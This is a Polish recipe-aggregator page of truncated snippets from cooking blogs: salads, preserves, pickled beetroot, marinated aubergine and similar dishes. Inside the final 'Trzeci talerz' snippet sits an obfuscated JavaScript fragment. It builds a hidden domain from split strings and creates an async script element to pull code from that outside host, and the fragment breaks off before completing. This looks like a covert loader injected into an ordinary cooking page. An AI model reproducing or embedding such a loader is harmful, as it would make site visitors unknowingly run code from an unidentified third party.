dania na wynos. Nad daniami do pracy popracuję jak tylko skończę malowanie, bo osobiście mam już dosyć mojego jedzenia w biegu. Przepisy podzielone są na kilka kategorii: Jajka Zupy Sałatki Curry, Ryże, Makarony, Placki Klopsy Wypieki Słodkie Wypieki Słone Pasty do chleba Dodatki Dużo tego, prawda? Osobiście mam na celowniku kilkanaście przepisów, bo listy składników nie są wymyślne, a sposób
Blondynka Gotujewiele sposobów. Jako składnik pasty kanapkowej też jest pyszny. W tym roku postanowiłam zamarynować go po zgrillowaniu. Plastry takiego bakłażana są idealne na kanapki czy jako dodatek do sałatek. Ci, którzy preferują pikantniejsze smaki, niech do każdego słoiczka dodadzą kawałek świeżej ostrej papryki lub ziarna pieprzu. Składniki: 1 i 1/2 kg średniej wielkości bakłażanów 1 duża główka czosnku
Codzienna kuchnia niecodziennamajonezu 3 ząbki czosnku sól, pieprz do smaku Sos: ząbki czosnku przecisnąć przez praskę. Dodać majonez i jogurt, doprawić do smaku i wymieszać. Odstawić na godzinę w chłodne miejsce. Sałatka: Brokuła podzielić na różyczki i ugotować w lekko osolonej wodzie. Jajka ugotować i obrać. Pomidory i jajka pokroić na ćwiartki. Fetę w kostkę. Wszystkie składniki przełożyć do miski, polać sosem
Smakołyki AsiSałatka z owocami to świetny pomysł na imprezkę dla naszych dzieciaków. Sprawdziła się kilka razy w tym roku na urodzinach mojej córki koleżanek. I ja taką przygotowałam. Dowolność owoców uzależniona jest od nas. Składniki: 1 banan 1 jabłko 4 śliwki 1 pomarańcza 2 nektarynki 1-2 kostki czekolady sok z cytryny Sposób przygotowania: 1. Owoce myjemy, banana i pomarańczę obieramy
Kuchnia domowa Aniwyglądał tak : 9 83 polubień na FB 154 obserwujących 17 postów 39 , 754 wyświetleń najpopularniejsze posty : Bananowe placuszki z czekoladą Brokułowa sałatka Pauli Cukiniowe placuszki w ziołowym cieście Dziękuję, że ze mną jesteście. Oczywiście zaglądajcie na Instagram i do moich Babeczek ! Chcę Was też zaprosić do nowej grupy, która powstała
Magiczne Życie Martyarabskiej, a konkretnie libańskiej. Mięso jest marynowane, pieczone i doprawione aromatycznymi przyprawami, dzięki czemu jest soczyste i niezwykle smaczne. Idealnie sprawdzi się jako farsz do pity podanej z ulubiona sałatką i sosem. Składniki : 400g piersi z kurczaka 3 łyżki octu 3 łyżki wody sok z połowy cytryny 1 łyżeczka przyprawy libańskiej siedem smaków pół niedużego bakłażana sól, pieprz ziarenka granatu
Codzienne GotowanieSałatka ziemniaczana z chorizo i burakami, które swoją słodyczą przełamują pikantny smak kiełbaski, skropiona kapitalnym 'strzelającym' dressingiem na bazie francuskiej musztardy z nutą wędzonej papryki i kopru. Jak na potrawę 'chłopską'- lekka, bo nie ocieka tłuszczem, ale mimo to konkretna, sycąca, w której to smaki ciekawie i smacznie się ze sobą komponują. 2 porcje: * ziemniaki-500 g * kiełbasa chorizo
Kraina Miodem Płynącaminut do zrumienienia mięsa. Upieczonego królika podzielić na porcje. Mięso królika najlepiej spożywać bardzo gorące, letnie już tak dobrze nie smakuje. Do mięsa podałam pure ziemniaczane, mizerię i sałatkę ze szpinaku oraz pomidorków
Kulinarne przemysleniaBłyskawiczna sałatka na śniadanie. Idealnym dodatkiem do niej są grzanki czosnkowo-paprykowe. Sprawdza się również w roli pudełkowego drugiego śniadania, więc bez problemu można ją zabrać do pracy. Czytaj więcej
Czekoladowa muffinkaTroszkę spóźnione podsumowanie kolejnych błyskawicznych piatków . Tym razem czternaście przepisów. Zapraszam! Danuta Sałatka z cukinii z sosem pieprzowym Arek Warianka Marzena Naleśniki z twarogiem i jagodami Bożena Grzyby z jajkiem Angelika Tarta na gryczanym spodzie z karmelizowaną gruszką Magdalena Francuskie tosty z dżemem i bananem Marta Lody z owocami Paulina Tort malinowo-jogurtowy bez pieczenia Gosia Pomidorowa
Magiczne Życie MartyPrzetworów ciąg dalszy. Dziś proponuję sałatkę z ogórków i papryki do słoików. Jest pyszna i chrupiąca. Zimą będzie idealna jako dodatek do obiadów. Składniki: 2 kg ogórków 3 średnie marchewki 4 duże czerwone lub kolorowe papryki 6 cebul 5 ząbków czosnku Zalewa: 1 szklanka octu 2 szklanki wody 1 szklanka cukru 1,5 łyżki soli 5 ziaren ziela angielskiego Ogórki
kuchnia doskikurkowym sosem, który powstał przy okazji przygotowywania farszu. Na drugi dzień natomiast, przysmażyłam mięsko na złoto, krótko, by nie wyschło, na mocno rozgrzanym tłuszczu- można podać z ulubioną sałatką, warzywami
PichceniomaniaSałatka jarzynowa kojarzy mi się z dzieciństwem, bo pamiętam, mając te kilka lat, że była przygotowywana na każde święta. Później gdzieś się przejadła, a jej smak przebiły nowe, dotąd mi nieznane jak np. gyros. Powróciłam do niej kilka lat temu, gdy poznałam swojego Męża ;) Okazało się, że ta najbardziej mu smakuje, więc cóż było zrobić- skoro mówią, że przez
Kuchnia w czekoladzieoctu, cukru i soli. Idealne proporcje zalewy sprawiają, że buraczki nie tracąc słodyczy nabierają jednocześnie ostrości. Takie buraczki to nie tylko dodatek do obiadu, ale świetna baza do lekkiej sałatki, np. z rukolą, fetą i ziarnami słonecznika. Składniki na 4 słoiczki 0,75 l: 3 kg niewielkich buraczków zbliżonej wielkości Zalewa: 4 szklanki przegotowanej wody 1 niepełna szklanka octu
Trzeci talerzpasztetu powoli, np. przygotować z nich koreczki. Możemy ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru
Moja smaczna kuchnia